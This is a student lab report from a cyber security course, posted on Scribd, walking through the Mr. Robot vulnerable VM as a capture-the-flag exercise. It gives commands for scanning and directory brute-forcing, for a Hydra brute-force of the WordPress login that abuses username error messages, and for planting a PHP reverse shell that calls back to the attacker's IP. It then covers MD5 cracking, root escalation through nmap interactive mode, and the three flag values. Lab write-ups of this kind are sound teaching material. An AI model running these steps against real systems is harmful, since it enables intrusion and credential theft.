Scribd
Upload
101 views31 pages

Lab Assignment 05b

Cyber Security5b

Uploaded by

Pradip Sarker
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
101 views31 pages

Lab Assignment 05b

Cyber Security5b

Uploaded by

Pradip Sarker
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Bangladesh University of Professionals (BUP)

[Link]. in Cyber Security

Course Code: MCS 1101


Course Name: Cyber Security Fundamentals

Lab Assignment No: 05b

Penetration Testing Mr. Robot

Submitted To: Submitted By:


Engr. Md. Mushfiqur Rahman Sree Pradip Kumer Sarker
ID No: 24525201005
Guest Faculty, Dept of CE
[Link]. in Cyber Security
Bangladesh University of Professionals (BUP)
BUP, Dhaka, Bangladesh.
Dhaka, Bangladesh.

1
Penetration Testing Mr. Robot
First, we need to download the Mr. Robot VM to run it on our computer environment. To do that
we need to visit this website below:
[Link]

Next, we need to import the Ova file of the Mr. Robot and when the machine starts to find its ip
and attack we need another machine to operate, I chose kali operating system.
So, from Kali, we use netdiscover to figure out the IPs running on the same block and will find
out the robot.

2
Here we get two IPs available in this block . Now we will scan these IPs with nmap to find
available open ports and identify the Mr. Robot.

3
We can also scan in different way using nmap to be ensure about the available target:
# sudo nmap -sC -sV -O [Link] -oN nmap-scan
Where,
● -sC: equivalent to — script=default, ie. running without script
● -sV: To determine the service/version information of open ports
● -O: that enables OS detection
● -oN: for output of scan in normal form, stored in nmap-scan

4
We can also scan on a different way ,to do that :
# nmap -A [Link] -oN nmap-scan-new
●-A: It enables OS detection, version detection, script scanning, and traceroute
●-oN: for output store

5
Among the 2 available IPs [Link] is available and All the scans are showing that 3 ports
are detectable and among them 2 ports are open , 80 and 443.
We can see it has open ports for apache web server . So we can assume that this is the Mr. Robot
host . So we can test it by browsing to this IP address from web browser.

If we browse to the ip address then we can see the starting of the Mr. Robot and we can come to
this page in the end of the functionalities. To view the source code of the page we can right click
on the page and click on source “View Page Source”.

Now we will search for the directories of this website using gobuster. Usually if the gobuster is
not installed in our system then we need to install the gobuster .

6
#apt install gobuster -y

We can also verify that the gobuter is installed.


#gobuster –h
To do the directory brute force using gobuster we will use the command below:
#gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -o [Link]
• gobuster dir: Invokes gobuster in directory mode to search for directories and files.
• -u [Link] Specifies the target URL to scan.
• -w /usr/share/wordlists/dirb/[Link]: Uses the wordlist located at
/usr/share/wordlists/dirb/[Link] for the scan. This wordlist contains common
directory and file names.
• -o [Link]: Outputs the results of the scan to a file named [Link].

7
We can also use dirbuster command to search directories of the web application using
wordlist ,where it will pop up a GUI to execute the similar function.
#dirbuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -o [Link]

8
This is showing a lot of results of the file directory of the application system.
We can also search using dirb tools to find out the directories of the application.
#dirb [Link] -w
9
To find web-server vulnerabilities we can use nikto tools . This tool checks and locate if any
known web-server vulnerabilities does the web application have.

Now for the footprint search of the application we need to browse all the directories found of
the application to get a proper footprint of the web application so that we can find the

10
loopholes to figure out the information of the application and find the mistakes and
vulnerability of the system.
Lets see some of the directories and files what they got:
#[Link]
Here we found a directory which is named wp-admin, and hitting into that through browser
we are getting the wordpress admin panel login window which is a big scoop for a hacker to
get into the system of the application.

We got that address from the gobuster directory search.

11
#[Link]
Here another directory which allow us to download a file if we open that we get very deep
and important information of the wordpress used here and other information which can be
helpful for a hacker to hack the application.

#[Link]
Here we can see a blog page also an image from the application folders.
#[Link]
This is a video content from the website.
#[Link]
This provides the license information of the wordpress .

12
#[Link]
From here we can get additional information of how can we install wordpress etc. are
shown.

#[Link]
Here we get some file information which will help us to track the footprint of the application
more deeply.

13
We got,
#[Link]
This link give us a .dic file which contains wordlist which may contains the username and
password to login to the admin panel.

#[Link]
This url holds a number of code or key which can be very useful in decoding encryption or in
fields in which it is used or maybe not.

14
Here we got a wordpress application admin panel link also got a file which [Link] which
contains lots of word. We are now going to try these words and the link to find vulnerability
of this site.
First we need to check how many words are there in the file [Link] .
To do that first we move to that folder where this [Link] file is located.

Lets check first how many words does this file contains. To do that we need to command:
#cat [Link] | wc –l

Here we can see this file contains 858160 words. We have to sort it out get a unique wordlist
which can be user in further actions.

Here we have 11451 unique words in this wordlist . So we will create a new wordlist of
unique entries in [Link] link.

15
Now we need to bring a brute force attack in the wordpress login page ,here for invalid
username it gives specific error that “Username Invalid”. Now optimizing this error message
attacker can find a username to enter the application system by matching that invalid user
message shows up or not .

#hydra –L [Link] –p wedontcare [Link] http-post-form ‘/wp-


[Link]:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
hydra: The name of the tool.
-t 64: Specifies the number of tasks (or threads) to run concurrently. In this case, 64 threads.
-L [Link]: Specifies the file containing the list of usernames to try.
[Link] is the file containing these usernames.
-p anything: Specifies the password to use. Here, it is set to "anything".
[Link]: The target IP address of the WordPress site.
http-post-form: Specifies the type of attack, which is an HTTP POST form.
'/[Link]:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid
username': The path to the login form and the format of the POST request. Here’s what each
part means:
/[Link]: The path to the WordPress admin login page.

16
log=^USER^&pwd=^PASS^&wp-submit=Log+In: The form data being sent in the POST
request. ^USER^ and ^PASS^ are placeholders that Hydra will replace with each username
from [Link] and the password specified (anything), respectively.

F=Invalid username: The condition for a failed login attempt. Hydra will consider a login
attempt unsuccessful if it finds the text "Invalid username" in the response.

Here we can see , we got three valid user name by utilizing the error message of the wrong
username and password , which is identifiable that which entry username is in the database
and which one is not .
Because entry of the wrong username gives error message as “Invalid username”, we took
the advantage and ignored all the entry which has output as “Invalid username” and got our
correct username because if the username is correct for false submit this application system
gives different error message.
Now we are going to utilize the error message if the password is wrong and get the correct
password for one of the correct username which we got from last brute force attack, which is
“elliot”.

17
#hydra – elliot –P [Link] [Link] http-post-form ‘/wp-
[Link]:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect’

For user “elliot” we got the password for it which is “ER28-0652”. So the application system
authentication has been broken. Now we can log into the website application’s wordpress
admin pages.

18
Now we want to take the control of the server machine , on its shell , to do that we need to
edit a file named “[Link]” with a payload named “[Link]” by
pentestmonkey.

Select all and copy the .php payload and paste to the “[Link]” file and update.

19
After updating the file we need to change the attackers ip address and the port for use by the
attacker to listen via netcat and update.

Here the attackers ip is :[Link]

After updating the file we will start listening from attackers machine towards the port defined
here which is 1234.

20
#nc –lnvp 1234

Now we need to browse to “[Link]/[Link]” to call the [Link] file as it is


related to [Link] ,this will give us the shell access of the “mrrobot” web application server.

To take control over terminal we need to use python to open the bash executable from bin
folder.

21
#python3 –c “import pty; [Link](‘/bin/bash’)”

python3: This invokes the Python 3 interpreter.

-c: This flag allows you to pass a command as a string to the Python interpreter.

"import pty; [Link]('/bin/bash')": This is the actual Python command that gets
executed.

import pty: Imports the pty module, which provides functions for handling pseudo-
terminals.

[Link]('/bin/bash'): Spawns a new pseudo-terminal and runs /bin/bash in it, effectively


upgrading your current shell to a fully interactive Bash shell.

22
We can now explore and gather footprints of the server itself by traveling through the folders
and files.

While exploring the folders in the home folder here user files are saved , we found a folder
name “robot”. In that folder we got two files one named [Link] and another is
[Link]-md5.

We could not open the [Link] file because of permission access control.
But we could open the [Link]-md5 file which contains a hash code which can be the
password which we can use to get root access to this device.

23
To crack this hash code we need to visit the Crackstation-online password hash cracker’s
website:
[Link]

So the crack of the hash code we found is “abcdefghijklmnopqrstuvwxyz”.


We can use a different way to crack the password using hashcat, for that we can download
the word list from crackstation.
[Link]

Hashcat is a hash password cracking tool which is really strong along with hash-identifier
to figure out which algorithm is in use for hashing.
First we need to install hash-identifier to identify on which algorithm the hash is encrypted:
To do that we need to make sure python and git is installed. Then we need to download the
git repository for hash-identifier:
#git clone [Link]

Then we go to the directory named hash-identifier and start the tool using python:

24
#cd hash-identifier
#python3 [Link]

When the hash-identifier starts we have to enter the hash we want to identify in which
algorithm it has been hashed:

25
It is showing in result that it has been hashed using MD5 algorithm . So we can also check
that online from [Link] this website.

26
So online result also showing it is MD5 hash type also have second answer as MD4 , as the
hash-identifier gave result it is MD5 , so take this result as preference.
Now we need to use hashcat to crack the hash. For different type of hash type hashcat has
different types of modules which can be identified by numbers. To find out the module
identifier for MD5 we just have to give this simple command :
#hashcat –h | grep MD5

Here the module number for MD5 is 0, which indicates to raw hash.
Now we need to save the hash into a file for further use in hashcat .
#echo ‘c3fcd3d76192e4007dfb496cca67e13b’ > [Link]

Now if we use the hashcat to compare the hash password with a wordlist from our inventory
if the wordlist has the password it will show the cracked password to us .
#hashcat –m 0 [Link] [Link]
Here hashcat is calling the hashcat tool , -m 0 is setting the hash type to MD5 , [Link] is
the file which is holding the hash code we got from footprinting.
[Link] is the file which is a word list which will be converted to MD5 hash one by one by
the hashcat and will compare with the given hash and give the actual password.

27
Now we got the password for robot user , we will shift our user from deamon to robot.
#su robot

To go back to daemon user we can use the python pty module :


#python3 –c “import pty; [Link](‘/bin/bash’)”
Now we will run nmap –interactive to get interactive shell of nmap. The nmap --interactive
mode is a feature in older versions of Nmap that allowed users to enter an interactive shell
within Nmap. This mode provided a more user-friendly interface for running Nmap
commands interactively, similar to how we might interact with a command-line shell.

#nmap --interactive

28
Now to run shell from robot user we need to start the shell from nmap –interactive shell
using !sh command:
Nmap>!sh
#whoami
#pwd

Now we can go to root folder also , so to do that we need to give command like :
#cd /root
#ls

Here we get key number 3.

29
So all the key flags we were able to discover:

key-1-of-3:
073403c8a58a1f80d943455fb30724b9

key-2-of-3:
822c73956184f694993bede3eb39f959

30
Key-3-of-3:
04787ddef27c3dee1ee161b21670b4e4

31

You might also like